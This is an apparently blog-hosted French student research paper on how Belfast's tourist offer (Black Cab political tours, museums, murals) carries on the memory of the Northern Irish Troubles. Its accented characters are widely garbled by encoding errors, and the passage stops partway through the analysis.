Tous les articles par angele

Le rA?le de la��offre touristique belfastoise dans la perpA�tuation de la mA�moire des « Troubles »

ParA�Emilie Guibert et Valentina Ferreira GutiA�rrez

1. Introduction

1.1A� Contexte

La��Irlande du Nord fut le thA�A?tre da��intenses conflits entre le 5 octobre 1968 – date de la Civil Right March A� Derry – et le 10 avril 1998 a�� date qui marque la��Accord du Vendredi Saint[1]. Ces derniers ont opposA� les rA�publicains, militant pour le ralliement A� la��Irlande, et les loyalistes, fidA?les A� la couronne da��Angleterre. La plupart des affrontements civils se sont dA�roulA�s A� Belfast, ville considA�rA�e comme A�tant la A� miniature urbaine du conflit national A� (Ballif, 2012, p.116). Ce contexte da��affrontements na��A�tait pas propice au dA�veloppement touristique de la capitale qui pA?tit durant de longues annA�es des images de violence et de sA�grA�gation diffusA�es A� travers le monde. En effet, dA?s 1969, on assiste A� la construction da��un mur, dit A�A�de la paixA�A�, sA�parant physiquement les communautA�s catholiques et protestantes. La pA�riode des Troubles contribua au dA�veloppement da��un imaginaire touristique associant Belfast A� la��instabilitA� et A� la��incomprA�hension culturelle (Morand, 2009), ce qui explique le fait que la��Irlande du Nord na��ait pas A�tA� privilA�giA�e en tant que destination touristique durant prA?s de trente ans. Cependant, la��accord de paix de 1998 marque le dA�but de la��expansion da��un nouveau tourisme en Irlande du Nord. Depuis, les compagnies aA�riennes desservent A� nouveau la capitale rA�gionale et le nombre de visiteurs serait passA� de 1.6 millions en 1999 A� 6.8 millions en 2006 (Morand, 2009, p.39). Les moteurs du dA�veloppement de ce nouveau tourisme sont multiples: da��une part, le gouvernement nord-irlandais sa��est servi de cet instrument afin de diversifier ses ressources A�conomiques (Legrand, 2002); da��autre part, cette ouverture au tourisme a contribuA� au renouvellement de la��image de la ville (Ballif, 2012). Dans le cadre de cette politique touristique, des espaces urbains et les traces du conflit sont A� mis en tourisme A� afin de susciter la��intA�rA?t des touristes tout en perpA�tuant la mA�moire de ce dernier.

Aujourda��hui, Belfast fait partie des destinations nouvellement A� rA�-ouvertes A� au tourisme (Morand, 2009) : les traces matA�rielles des Troubles ont A�tA� patrimonialisA�es et sont exploitA�es en tant que ressources touristiques par des acteurs privA�s et publics (Naef, 2013). Ce patrimoine qui comprend les murals, symboles de la lutte entre deux communautA�s (Ballif, 2014) et tA�moignages de la guerre civile, sont trA?s prisA�s par les visiteurs. Ceux-ci sont mentionnA�s dans les guides touristiques comme A�tant des A�hauts-lieux de la ville A� (Ballif, 2012, p.118), de par leur reprA�sentativitA� de la��histoire de Belfast. Dans le cadre de notre travail, nous les considA�rerons comme A�tant des supports de mA�moire, car les discours les accompagnant sont souvent porteurs da��expA�riences personnelles. On le verra par la suite, les acteurs touristiques ont tendance A� mettre en scA?ne leur vA�cu lorsqua��ils font visiter certains monuments ou lieux historiques. Mis A� part les murals, il existe da��autres supports de mA�moire dont la nature varie.

Il existe da��une part des symboles matA�riels parmi lesquels figurent des musA�es, A�des mA�moriels ou des quartiers ayant A�tA� touchA�s par les affrontements, comme ceux de Shankill et Falls. Da��autre part, on retrouve aussi des supports de mA�moire immatA�riels et symboliques tels que des tA�moignages oraux. Cependant, malgrA� cette diversitA� de supports, les murals constituent, au vu de ce que nous avons pu observer lors de notre sA�jour, la��A�lA�ment le plus rA�current proposA� par la��offre touristique orientA�e vers la thA�matique des Troubles. Enfin, le fait que les touristes prA?tent une attention grandissante A� la��A�gard de ces sites emblA�matiques du conflit reflA?te, selon nous, leur dA�sir de participer A� la perpA�tuation de la mA�moire de ce dernier (Morand, 2009, p. 45).

1.2 Les concepts relatifs au tourisme mA�moriel

Mener une A�tude dans ce contexte implique de dA�finir au prA�alable certains concepts. Nous tirerons de la littA�rature certaines dA�finitions afin de poser un cadre thA�orique qui nous servira de base pour notre dA�veloppement. Nous dA�finirons donc de maniA?re prA�cise ce que nous entendons lorsque nous mentionnons les notions de mA�moire, lieu de mA�moire, mise en tourisme et tourisme mA�moriel.

Dans sa thA?se, Anne-CA�line Morand reprend les dires de Pierre Morand qui stipule que A�A�(a��) la mA�moire est la vie, toujours portA�e par des groupes vivants et A� ce titre, elle est en A�volution permanente, ouverte A� la dialectique du souvenir et de la��amnA�sie inconsciente de ses dA�formations successives, vulnA�rable A� toutes les utilisations et manipulations, susceptible de longues latences et de soudaines revitalisations.A�A� (Morand, 2009, p.9). La mA�moire sa��oppose donc A� la��histoire dans le sens oA? elle fait rA�fA�rence A� des faits dont il existe encore des tA�moins vivants, crA�ant de ce fait un lien entre les temps chronologiques du prA�sent et du passA�. La mA�moire suppose donc qua��une personne physique soit porteuse de cette derniA?re. Par ailleurs, la mA�moire est sujette A� des transformations au fil de sa transmission contrairement A� la��histoire qui est une reconstruction incomplA?te mais immuable de ce qui na��est plus (Morand, 2009, p.9).

Il existe un lien entre mA�moire et espace, car la mA�moire tend A� sa��incarner dans des lieux ou des reprA�sentations de lieux (Petitier, 1989). De lA� dA�coule la notion de lieu de mA�moire. Selon Jean-Didier Urbain, un lieu de mA�moire na��est pas une destination comme les autres. Elle na��existe pas en soi, mais par un regard spA�cifique. A�Celui qui se souvient transforme un simple lieu en rA�ceptacle da��un passA� toujours vivant dans les mentalitA�s (Urbain, 2003). Le lieu de mA�moire peut A?tre topographique, monumental ou symbolique (Petitier, 1989) mais reste indissociable de celui qui le pense. Tout comme dans la notion de mA�moire explicitA�e ci-dessus, on retrouve, dans la dA�finition du lieu de mA�moire, le lien existant entre ce qui est passA� et ce qui est prA�sent.

Ces lieux peuvent, selon la��expression employA�e par la��Equipe MIT, A?tre mis en tourisme (Equipe MIT, 2000). Cette mise en tourisme consiste en la construction da��une dA�sirabilitA� de ces lieux potentiellement associA�s A� la violence, A� la mort, au deuil, et au sacrifice (Hertzog, 2012). Dans le cas de notre A�tude, les lieux de mA�moire sont construits par les acteurs touristiques comme destinations A�sA�duisantes pour le visiteur. Ce processus tend A� transmettre un message contribuant A� la construction da��une image de la ville censA�e susciter la��intA�rA?t du touriste (Hertzog, 2012).

Enfin, ces lieux de mA�moire sont mis en tourisme dans le cadre da��un tourisme mA�moriel. La dA�finition de ce type particulier de tourisme mentionnA�e par Jean-Didier Urbain est la suivante: A�A la��intA�rieur da��un territoire, il est outil de consolidation da��une unitA� culturelle, da��une construction identitaire, da��une formation des peuples. A la��extA�rieur, pour le visiteur A� la culture da��accueil, il est vecteur de diffusion da��une image, da��une identitA� culturelle A� (Urbain, 2003, p.6). Le tourisme mA�moriel suppose donc un individu porteur da��une mA�moire, qua��il transmettrait A� des fins de crA�ation identitaire et de lutte contre la��oubli. Ca��est un tourisme du passA� sans A?tre un tourisme passA�iste ou nostalgique qui reviendrait A� un simple A� retour aux origines A� (Urbain, A�2003). Il permet de perpA�tuer la mA�moire des A�vA�nements passA�s en les rapatriant dans le prA�sent et en les transmettant A� autrui. Vecteur de conscientisation historique de celui qui en fait la��expA�rience, ce type de tourisme contribue A� la��acceptation du passA� et participe indirectement au maintien de la paix sociale en crA�ant une certaine da��intercomprA�hension culturelle.

Notre cadre thA�orique A�tant dA�fini, nous allons pouvoir passer A� la prA�sentation des enjeux sous-jacents A� notre thA�matique, ainsi qua��A� la problA�matique qua��elle soulA?ve. Au fil de ce travail, nous reviendrons souvent sur ces diffA�rentes dA�finitions.

1.3 ProblA�matique et enjeux

Ca��est dans le cadre de la mise en tourisme da��A�lA�ments relatifs aux Troubles que notre dA�marche sa��inscrit. Dans une ville qui a souffert de violents affrontements, les murals, les mA�moriels et certains quartiers constituent des preuves matA�rielles des A�vA�nements passA�s. Il sera question ici de comprendre comment le tourisme belfastois cherche A� faire connaA�tre la��histoire des Troubles aux visiteurs. Notre travail consistera en une analyse de la��offre touristique A� travers la perspective du tourisme mA�moriel, ou tourisme de mA�moire. Comme mentionnA� ci-dessus, ce type de tourisme A� vocation pA�dagogique fait rA�fA�rence A� un phA�nomA?ne ancien ayant dA�butA� avec la PremiA?re Guerre Mondiale, et qui a contribuA� dA?s les annA�es 1990 A� la production da��un imaginaire touristique (Hertzog, 2012). Dans ce contexte, les traces de guerre deviennent une ressource mobilisA�e par les acteurs de la��offre touristique. Nous analyserons donc comment ces derniers font appel A� la mA�moire du conflit ayant sA�vi entre 1969 et 1998 en A�tudiant la mise en tourisme des murals et des autres A�lA�ments porteurs de mA�moire.

A� travers notre approche mA�morielle de la��offre touristique belfastoise, nous pouvons voir A�merger deux enjeux. PremiA?rement, on constate que les discours da��anciens prisonniers politiques et da��autres personnes ayant vA�cu ou participA� au conflit sont mobilisA�s par la��industrie touristique. Da��une part, nous pouvons penser que cette mise en scA?ne sa��inscrit dans une logique de recherche de profit, car les touristes ont tendance A� A?tre attirA�s par les anecdotes personnelles. De ce fait, cette tendance peut A?tre instrumentalisA�e A� des fins A�conomiques. Da��autre part, la mise en scA?ne de discours peut A�galement rA�pondre A� la volontA� de transmettre A� autrui la mA�moire des A�vA�nements passA�s. Dans le cadre de notre thA�matique, nous allons plutA?t nous pencher sur ce second aspect car il peut A?tre mA� par un enjeu de sensibilisation. Lorsque nous avons rencontrA� un conducteur de Black Cab, nous lui avons posA� des questions sur les motivations qui la��ont poussA� A� devenir guide touristique. Ce dernier nous a alors rA�pondu qua��il A�tait nA�cessaire que les individus soient conscients de la gravitA� de la situation ayant sA�vi A� Belfast. De ce fait, il est selon lui primordial de sensibiliser le visiteur par le biais de la transmission da��expA�rience personnelle. De maniA?re gA�nA�rale, il sa��agit donc de faire comprendre aux touristes pourquoi les A�vA?nements se sont dA�roulA�s ainsi, en explicitant les raisons qui ont poussA� les acteurs prA�sents A� la��A�poque A� agir de la sorte. Plus qua��une justification de leurs actes, ces expA�riences personnelles sont mobilisA�es dans le but de sensibiliser les touristes A� la situation locale afin que ces derniers assimilent au mieux la mA�moire du conflit.

DeuxiA?mement, nous avons dA�celA� un enjeu pA�dagogique lors de notre analyse de la��offre touristique. On peut considA�rer que les acteurs de ce milieu ont pour but da��instruire le visiteur dans le cadre da��un tourisme mA�moriel. Outre le fait da��inculquer certaines connaissances historiques, une des raisons de la vocation pA�dagogique de ce type de tourisme peut A?tre, selon nous, de promouvoir la��intercomprA�hension culturelle. En effet, nous pensons que le fait de transmettre la��histoire du conflit A� autrui par le biais du tourisme mA�moriel peut engendrer plus de rA�ceptivitA�, permettant une meilleure assimilation des A�lA�ments historico-culturels locaux. Ce tourisme pA�dagogique conduit donc celui qui en fait la��expA�rience A� adopter une attitude plus critique envers la situation belfastoise et envers lui-mA?me, A� condition que celui-ci effectue un travail de distanciation et ne considA?re pas chaque rA�cit personnel comme A�tant la seule et unique version des A�vA�nements passA�s.

1.4 Question de recherche et hypothA?ses

AprA?s avoir A�tabli le contexte ainsi que les enjeux de notre thA�matique, nous allons dA�finir notre question de recherche. On observe dans la��offre touristique de la capitale rA�gionale une volontA� de mettre en avant son identitA� ainsi que la maniA?re dont la population a vA�cu le conflit. Ce processus sa��opA?re A� travers la prA�sentation de la mA�moire belfastoise aux touristes (Morand, 2009, p.56). La��offre touristique actuelle diffA?re beaucoup de celle qui a directement fait suite A� la pA�riode des Troubles. Peu de temps aprA?s la��Accord de Paix de 1998, il sa��agissait de faire oublier ce sombre A�pisode a�� ca��est da��ailleurs ce que certains prestataires publics continuent de faire, pour des raisons de neutralitA�, ou dans la��espoir de donner une meilleure image de la ville.

Cependant, la mA�moire du conflit est aujourda��hui mise en avant par divers prestataires, notamment par des agences touristiques privA�es. Ces derniers proposent diffA�rents types de circuits, appelA�s Political Tours (Morand, 2009, p.63). Ca��est dans le cadre de la mise en scA?ne de la mA�moire par la��offre touristique que rA�side tout la��intA�rA?t de notre travail. La question A� laquelle nous allons tenter de rA�pondre sera donc la suivante:

Comment la��offre touristique belfastoise inclut-elle le touriste A� la production de mA�moire? Comment la��espace est mobilisA� par la��offre touristique belfastoise dans le cadre de la territorialisation de la mA�moire?

Trois hypothA?ses dA�coulent de ces deux questionnements. Celles-ci nous aideront A� orienter nos recherches.

H1: Les acteurs de la��offre touristique mettent en scA?ne des rA�cits personnels dans le cadre de visites interactives qui stimulent la co-construction de mA�moire.

A travers le concept de A�A�rA�cits personnelsA�A�, nous entendons toutes les expA�riences vA�cues et les tA�moignages du conflit mis en avant par la��offre touristique. De maniA?re gA�nA�rale, nous nous attendons A� faire la��expA�rience de visites touristiques interactives, durant lesquelles notre opinion et notre ressenti sont sollicitA�s. En ce qui concerne les prospectus touristiques des agences locales, nous pensons y retrouver des expressions faisant allusion A� un retour dans le temps, ou nous proposant une certaine immersion dans la��A�poque des Troubles, ce qui aurait pour but la stimulation de la co-construction de mA�moire.

Lors des Political Tours, nous nous attendons A� A?tre plongA�es dans le vA�cu trA?s personnel des guides touristiques ayant participA� A� la pA�riode des Troubles. Ainsi, cela nous aidera A� nous rapprocher de ces derniers et A� dA�velopper une certaine empathie envers eux. Ce processus conduit A� un glissement entre la position de chercheur et celle de touriste, ce qui peut potentiellement biaiser la validitA� de nos rA�sultats. Cependant, nous effectuerons un travail de distanciation et da��objectivation lors du traitement de notre matA�riau da��analyse, bien que la��objectivitA� totale constitue un objectif inatteignable.

H2: La��offre touristique met en place des circuits pA�dagogiques qui amA?nent le visiteur A� participer activement A� la perpA�tuation de la mA�moire du conflit.

Lors des visites touristiques, nous nous attendons A� A?tre instruites sur la��histoire des Troubles. De ce fait, nous espA�rons qua��A� la fin de notre sA�jour A� Belfast, nous disposerons de tous les A�lA�ments nA�cessaires pour nous forger notre propre opinion A� la��A�gard de cette pA�riode. Le fait da��avoir assimilA� en profondeur les A�vA�nements ayant sA�vi durant les Troubles nous permettra peut-A?tre da��A?tre capables de transmettre ce savoir acquis A� autrui, ce qui fera de nous des personnes actives dans la perpA�tuation de la mA�moire de la��histoire belfastoise.

H3: Il existe un processus de territorialisation de la mA�moire en certains lieux spA�cifiques.

Finalement avec cette derniA?re hypothA?se, nous nous attendons A� voir une rA�partition et/ou une territorialisation de la mA�moire en certains lieux ou secteurs spA�cifique de la ville. La territorialisation de la mA�moire conduit la��individu A� associer un souvenir A� un certain lieu, elle peut donc A?tre exploitA�e A� des fins touristiques.

2. MA�thodologie

Nous allons A� prA�sent tenter de rA�pondre A� nos questions de recherche par le biais de la vA�rification de nos hypothA?ses sur le terrain. Pour ce faire, nous analyserons les modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production mA�morielle.

Nos expA�riences touristiques A� Belfast furent nombreuses et nous avons sA�lectionnA� celles qui avaient trait A� notre thA�matique, A� savoir : la visite guidA�e de la Linen Library et des archives du conflit, un City Tour en bus proposA� par la compagnie privA�e Belfast City Sightseeing open top Bus tour, la dA�couverte des quartiers de Falls et Shankill en Black Cab, la visite du Centre Culturel GaA�lique, et enfin les visites de la��Ulster Museum ainsi que celle du Loyalist Museum a�� Andy Tyrie Interpretive Centre accompagnA�e da��un tour dans le quartier de East Belfast. Parmi les acteurs touristiques que nous avons analysA�s, certains sont donc issus de compagnies publiques, et da��autres de compagnies privA�es. Comme nous na��avons pas toujours A�tA� en mesure de savoir si les acteurs touristiques rencontrA�s A�taient issus du domaine public ou du privA�, nous avons dA�cidA� de ne pas attacher trop da��importance A� cette distinction.

Aussi, nous sommes conscientes que cette liste est non-exhaustive et que notre regard sur ces visites a potentiellement A�tA� biaisA� par nos objectifs de recherche. Notre statut de chercheuses nous inclut dans une certaine catA�gorie de touriste, A� savoir, celle des individus intA�ressA�s par la dimension pA�dagogique et la dA�marche scientifique dans la visite da��un lieu (Crahay, 2014). De ce fait, nous nous trouvons dans une position intermA�diaire entre celle du touriste et celle du chercheur scientifique. Cette situation na��est pas sans consA�quence.

Da��un cA?tA�, nous aurons tendance A� nous A�loigner de la position de touriste, car nous aurons peut-A?tre un point de vue plus critique que ces derniers. En effet, contrairement aux touristes en recherche de divertissement, nous vivrons ces expA�riences en restant focalisA�es sur nos objectifs de recherche.

De la��autre, nous na��adopterons pas totalement la posture da��un chercheur scientifique du fait que nous baserons notre analyse sur notre ressenti. De ce fait, nous serons nous-mA?mes objets de notre recherche, ce qui pourrait altA�rer la validitA� de nos conclusions.

Dans le cadre de nos deux premiA?res hypothA?ses, le fait da��A?tre A� la fois chercheuses et objet de recherche biaisera la��interprA�tation de nos rA�sultats, et nous posera problA?me lorsqua��il sa��agira de vA�rifier la��interactivitA� des visites et leur aspect pA�dagogique. En effet, afin de neutraliser la��effet de ce glissement, il nous aurait fallu interroger da��autres touristes ayant participA� aux mA?mes visites, et A�ventuellement effectuer une observation participante afin que notre matA�riel da��analyse soit plus reprA�sentatif. Malheureusement, nous na��avons pas A�tA� en mesure de mener A� bien ces dA�marches, faute de temps et de moyens.

Plus concrA?tement, afin de rA�pondre A� nos questions de recherche, nous avons A�tA� trA?s attentives A� la faA�on dont les murals et les autres A�lA�ments ayant trait au conflit sont prA�sentA�s lors des visites. De ce fait, nous avons analysA� comment les agences proposent de nous A�A�faire visiterA�A� la ville. Ensuite, nous avons rA�coltA� un maximum de matA�riel publicitaire A� analyser, comme des prospectus et des affiches touristiques. Nous avons par ailleurs demandA� conseil A� un office de tourisme ainsi qua��A� la rA�ception de notre auberge, dans le but de voir le type de visites proposA�. En analysant ces documents, nous avons tentA� de repA�rer des slogans-types invitant le visiteur A� sa��immiscer dans la��atmosphA?re des Troubles.

Enfin, un carnet de terrain nous a A�tA� essentiel. Lors des visites guidA�es, nous avons relevA� les A�lA�ments qui A�taient pour nous susceptibles da��inclure le visiteur A� la perpA�tuation de la mA�moire du conflit. En effet, au niveau de la��offre touristique, les visites ayant pour thA�matique le conflit nord-irlandais et tendant A� inclure le visiteur A� la production de mA�moire se dA�clinent en plusieurs modalitA�s, notamment la mise en scA?ne de rA�cits personnels et la valorisation de circuits pA�dagogiques. Par exemple, les Black Cabs proposent au visiteur de faire un tour de la ville. Souvent, le chauffeur est un ancien prisonnier politique qui raconte A�les A�vA�nements passA�s selon son appartenance religieuse, ce qui fait que le touriste prendra connaissance de la ville A� travers les yeux da��un protestant ou da��un catholique (Lisle, 2006). La��intA�rA?t de ce genre de visite sera de voir en quoi ce processus nous implique dans la co-construction de mA�moire.

3. ElA�ments da��analyse

3.1 Deux modalitA�s touristiques fonctionnant dans un cadre interactif

3.1.1 La mise en scA?ne de rA�cits personnels

a) Un tourisme informatif et historique

Parmi nos diverses expA�riences, deux da��entre elles ne nous permettent pas da��affirmer la��hypothA?se selon laquelle la��offre touristique met en scA?ne des rA�cits personnels dans le cadre du tourisme mA�moriel. La premiA?re visite durant laquelle nous na��avons relevA� que trA?s peu da��A�lA�ments relatifs aux Troubles est celle du City Hall. Aucun rA�cit personnel na��a A�tA� mis en avant par notre guide qui nous a prA�sentA� une vision relativement institutionnelle de la��histoire de la ville. La seconde visite durant laquelle la��interaction et la mise en scA?ne de rA�cits personnels na��est pas de mise est celle proposA�e par les Belfast City Sightseeing open top Bus tour : lors de cette visite, les informations A�taient transmises de maniA?re impersonnelle. Cette impression peut A?tre due au fait que cette compagnie, bien que privA�e, possA?de une licence du dA�partement de la��environnement qui les oblige A� rester neutre. Proposer des rA�cits personnels pourrait paraA�tre trop partial pour ce genre de visite. Selon nous, ces deux visites ne sa��inscrivent pas dans le cadre da��un tourisme mA�moriel mais plutA?t dans celui da��un A� tourisme informatif A� ou A� historique A�.

b) Des rA�cits personnels dA�guisA�s?

Nos impressions sont plus mitigA�es quant A� la visite du Loyalist Museum et du quartier de East Belfast: nos deux guides na��ont pas mis leurs propres expA�riences en avant et na��ont que trA?s peu parlA� da��eux. Cependant, nous avons senti dans leur discours que ces derniers ont A�tA� impliquA�s da��une maniA?re ou da��une autre dans le conflit, car ils utilisaient le pronom personnel A� nous A� lorsqua��ils nous prA�sentaient les actions armA�es perpA�trA�es par les groupes protestants (UFF, UDA, UYM)[2]. Aussi, la tension A�tait palpable lorsqua��ils nous parlaient des victimes loyalistes et nous prA�sentaient les nombreux mA�moriels protestants. MA?me si cette visite na��a pas A�tA� des plus interactive et que nous na��avons dA�celA�, a priori, aucun rA�cit personnel, sa neutralitA� na��a pas A�tA� totale: selon nous, le fait de prA�senter les forces protestantes comme A�tant de A� bons justiciers A�, peut avoir pour finalitA� de nous rallier A� leur cause. Nous pouvons donc considA�rer cela comme une invitation A� la perpA�tuation de A�A�leurA�A� mA�moire du conflit. En effet, nos deux guides nous ont expliquA� avoir crA�A� ce musA�e en rA�action au succA?s des Black Cabs, majoritairement catholiques, afin de pouvoir, eux aussi, perpA�trer leur version de la��histoire.

Enfin, trois visites nous permettent de vA�rifier la��hypothA?se selon laquelle la��offre touristique met en place des rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit.

c) Un rA�el partage da��expA�riences de vie ?

Dans un premier temps, la partie archive de la Linen Library fut trA?s intA�ressante. Au dA�but, notre guide sa��est attardA� sur un grand livre datant de 1969 qui recense la population de Belfast de la��A�poque ainsi que les rues prA�sentes A� cette date. Ce dernier lui rappelle son enfance, car certains endroits qua��il apprA�ciait A�tant enfant ont A�tA� dA�truits durant les Troubles. En tant que support de mA�moire, ce registre dans lequel figure son grand-pA?re confA?re A� notre guide le statut de mA�diateur : par le biais de ce dernier, il nous a transmis A� la fois la mA�moire de son grand-pA?re, la sienne, mais aussi celle de la gA�ographie passA�e de la ville. Ensuite, des rA�cits personnels ont A�tA� mis en scA?ne par le biais de divers supports: par exemple, on trouve dans ce musA�e des lettres A�crites, durant le conflit, par da��anciens prisonniers en grA?ve de la faim sur du papier toilette ou du papier A� cigarette. Ces derniers, ayant la��interdiction de communiquer avec la��extA�rieur, sa��en servaient pour donner des nouvelles A� leur famille par la��intermA�diaire des prA?tres. Cette fonction a aujourda��hui laissA� la place A� celle de la transmission de mA�moire : en tant que touriste, nous avons eu la��opportunitA� de lire ces rA�cits personnels, et donc de sa��imprA�gner, la��espace da��un instant, du souvenir de quelques individus. Cependant, notre rA?le dans la co-construction et la perpA�tuation de leur mA�moire se limite A� nous remA�morer ces A�crits, car notre capacitA� de retransmission de cette mA�moire est limitA�e, entre autres par la��interdiction de les photographier.

Ensuite, bien qua��une grande partie de la��Ulster Museum relative aux Troubles soit constituA�e da��informations objectives et de faits historiques irrA�futables prA�sentA�s de maniA?re unilatA�rale, nous avons dA�couvert grA?ce A� la��un de nos camarade une petite section portant sur des tA�moignages audio du conflit. Cette partie du musA�e, regrettablement peu mise en valeur, nous a permis de nous plonger dans le vA�cu des individus. La partie BBC Legacy de cette plateforme fut trA?s intA�ressante dans le cadre de notre travail, car la prA�sentation des rA�cits personnels y est faite da��une maniA?re telle qua��elle est accessible A� tout un chacun : en effet, il na��est pas nA�cessaire da��avoir certaines connaissances scientifiques ou historiques prA�alables pour A?tre touchA� par ces commentaires et la mA�moire du narrateur nous parvient mA?me si ce dernier ne se trouve pas en face de nous. Par exemple, parmi les rA�cits partisans figure la��histoire da��un homme loyaliste, dont la famille A�tait trA?s impliquA�e dans le conflit. Ce dernier conte les raisons de son attitude critique envers les actes de sa famille et nous explique qua��il a dA�cidA� de sa��en A�carter avec sa sA�ur.

Un autre tA�moignage que nous avons entendu est celui da��une femme catholique racontant son enfance perdue, sa mA?re ayant A�tA� assassinA�e durant les Troubles lorsqua��elle avait neuf ans. Da��autres rA�cits purement personnels qui ne mentionnent pas la position de la��individu dans le conflit sont proposA�s, comme celui da��une femme touchA�e par balle A� la jambe alors qua��elle A�tait enceinte de trois mois. Cette derniA?re nous fait part de ses prA�occupations et angoisses du moment en nous affirmant que mA?me si elle et son enfant ont survA�cu, ce traumatisme la hantera A� vie.

Ces tA�moignages ont eu pour effet de nous plonger directement dans la��atmosphA?re du conflit. MA?me si cette expA�rience na��A�tait pas interactive, nous sommes aujourda��hui porteuses de la mA�moire de ces personnes.

Enfin, une derniA?re expA�rience qui nous permet da��affirmer notre premiA?re hypothA?se est celle de la visite des quartiers de Shankill et Falls en Black Cab. Une citation issue du flyer de la compagnie TaxiTrax illustre bien la��idA�e de transmission de mA�moire par le biais da��expA�riences personnelles: A�A�All of our drivers are highly experienced with a wealth of personal knowledge, guaranteeing your trip to be something you will always remember. (a��) [A]s your driver shares a little personal anecdote, you can be sure that you will have seen the real Belfast (a��)A�A�. En effet, au vu de notre expA�rience dans ces taxis nous pouvons affirmer la vA�racitA� de cette citation : premiA?rement, cette visite nous a vA�ritablement permis de nous projeter dans la pA�riode des Troubles, car la mise en rA�cit y est trA?s valorisA�e. Tout au long de cette escapade en voiture, notre chauffeur nous faisait part des histoires qua��il avait vA�cu durant le conflit. Par exemple, lorsque nous lisions les noms des dA�funts mentionnA�s sur les mA�moriels, il nous avouait que certains da��entre eux faisaient partie de ses amis. Aussi, ayant A�tA� lui-mA?me prisonnier politique, cela rendait son discours da��autant plus poignant et nous avons vraiment A�tA� touchA�es par ce qua��il nous a confiA�. Lorsque nous lui avons demandA� pourquoi il avait voulu exercer cette profession, ce dernier nous a simplement rA�pondu : A�A�I want to put a face on the situation and humanize the warA�A�. Suite A� cela, il nous a affirmA� qua��il prA�fA�rait raconter lui-mA?me sa perception du conflit plutA?t qua��elle soit transmise par le biais da��un livre da��histoire, car les gens sont plus rA�ceptifs lorsqua��une personne parle elle-mA?me de son histoire. En effet, la mise en scA?ne de son vA�cu personnel nous a poussA� A� ressentir de la compassion et nous a conduit A� une meilleure comprA�hension de sa position. Cet effet a A�tA� renforcA� par le fait que la visite A�tait interactive : notre conducteur rA�pondait volontiers A� toutes nos questions, mA?me si ces derniA?res A�taient parfois intimes. En discutant avec lui, nous avons eu la��impression de participer A� la co-construction de la mA�moire des Troubles, car nous pouvons dire qua��A� prA�sent, nous avons acquis une infime partie de la sienne.

Au vu de ces expA�riences touristiques, nous pouvons affirmer que la��une des modalitA�s de la��offre touristique belfastoise qui contribue A� la perpA�tuation de la mA�moire du conflit est la mise en scA?ne de rA�cits personnels dans une perspective interactive. Bien que cette modalitA� ne soit pas de mise partout, notre visite guidA�e du Loyalist Museum, notre tour en Black Cab, et la visite de la��Ulster Museum ont pour point commun de valoriser la mise en rA�cit dans le but de plonger le visiteur dans la dure rA�alitA� qui a sA�vi A� Belfast entre 1969 et 1998.

3.1.2 La valorisation de circuits pA�dagogiques

a) Une transmission unilatA�rale da��informations

Notre deuxiA?me hypothA?se qui stipule la mise en place de circuits pA�dagogiques stimulant la co-construction de mA�moire se voit rA�futA�e A� plusieurs reprises. PremiA?rement, nous avons trouvA� la visite du City Hall trA?s peu pA�dagogique dans le sens oA? il sa��agissait da��un tourisme oA? la��interaction avec le visiteur A�tait quasi inexistante. Un guide nous a accueilli et nous a prA�sentA� le City Hall en nous donnant beaucoup da��informations sans attendre de rA�flexions trA?s poussA�es de notre part. En effet, la quantitA� de matiA?re transmise par ce dernier A�tait telle qua��il nous A�tait difficile de rebondir sur ces informations. Le seul moment interactif dA�celA� lors de cette visite fut le moment oA? nous nous sommes assises sur la chaise du maire. Toutefois, nous ne pouvons qualifier cet A�pisode de pA�dagogique, mais uniquement da��interactif, car il ne nous a pas permis de comprendre pour autant le fonctionnement du systA?me politique belfastois.

Nous avons ressenti le mA?me manque de pA�dagogie lors du Belfast City Sightseeing open top Bus. Sur leur flyer, le fait de visiter les murals les plus cA�lA?bres de Belfast et de parcourir de long en large le Peacewall A�tait prA�sentA� comme un point fort de la compagnie. Cependant, ceci na��a A�tA� en fait qua��une infime partie de ce que le tour propose, et les informations relatives A� la thA�matique des Troubles se sont retrouvA�es noyA�es dans une masse d’informations, notamment relatives A� la��histoire du Titanic. Si nous A�tions des touristes en recherche da��un survol de la ville, cette visite aurait A�tA� amplement suffisante. Or, en tant que chercheuses nous avons trouvA� cette visite trA?s superficielle, ce qui nous a empA?chA� da��en saisir le fil conducteur. Ainsi, nous avons eu la��impression da��A?tre de simples spectatrices du fait que nous na��avons pas eu la��opportunitA� de manifester notre comprA�hension et/ou incomprA�hension des informations qui nous A�taient donnA�es.

Puis, nous avons jugA� important de visiter le musA�e officiel de la ville afin da��avoir un avis neutre sur le conflit. Nous nous sommes donc rendues A� la��Ulster Museum oA? nous avons pu explorer la section dA�diA�e aux Troubles. Loin da��A?tre inintA�ressante, cette exposition parle da��elle-mA?me, ca��est pourquoi elle ne nA�cessite pas la prA�sence da��un guide. Il sa��agit da��un espace oA? sont disposA�s des murs avec du texte et des images qui retracent la��histoire du conflit. Une fois encore, nous avons eu affaire A� une transmission unilatA�rale da��informations, sans interaction entre le visiteur et la��acteur de la��offre touristique. Nous na��avons dA�celA� aucun moyen pour le touriste de participer A� cette co-construction de mA�moire, par le biais de rA�flexions qui conduiraient le prestataire A� modifier son offre par rapport aux attentes du public. En ce qui concerne la plateforme des tA�moignages mentionnA�e dans notre premiA?re hypothA?se, elle est A�galement composA�e da��une partie nommA�e CAIN Web Service qui comprend des sources scientifiques et des articles divers A� propos du conflit. Cependant, mA?me si cette partie participe en quelque sorte A� la��assimilation de la mA�moire par le touriste, nous avons trouvA� cette derniA?re trA?s acadA�mique et peu accessible A� tout un chacun. En effet, il sa��agit da��articles scientifiques qui nA�cessitent une certaine connaissance prA�alable pour assurer leur comprA�hension. Ceci nous laisse penser que cette rubrique est plutA?t dirigA�e vers des chercheurs en quA?te da��informations prA�cises. Ainsi, cela contribue A� discriminer les individus disposant de peu de capital culturel dans le processus de perpA�tuation de la mA�moire.

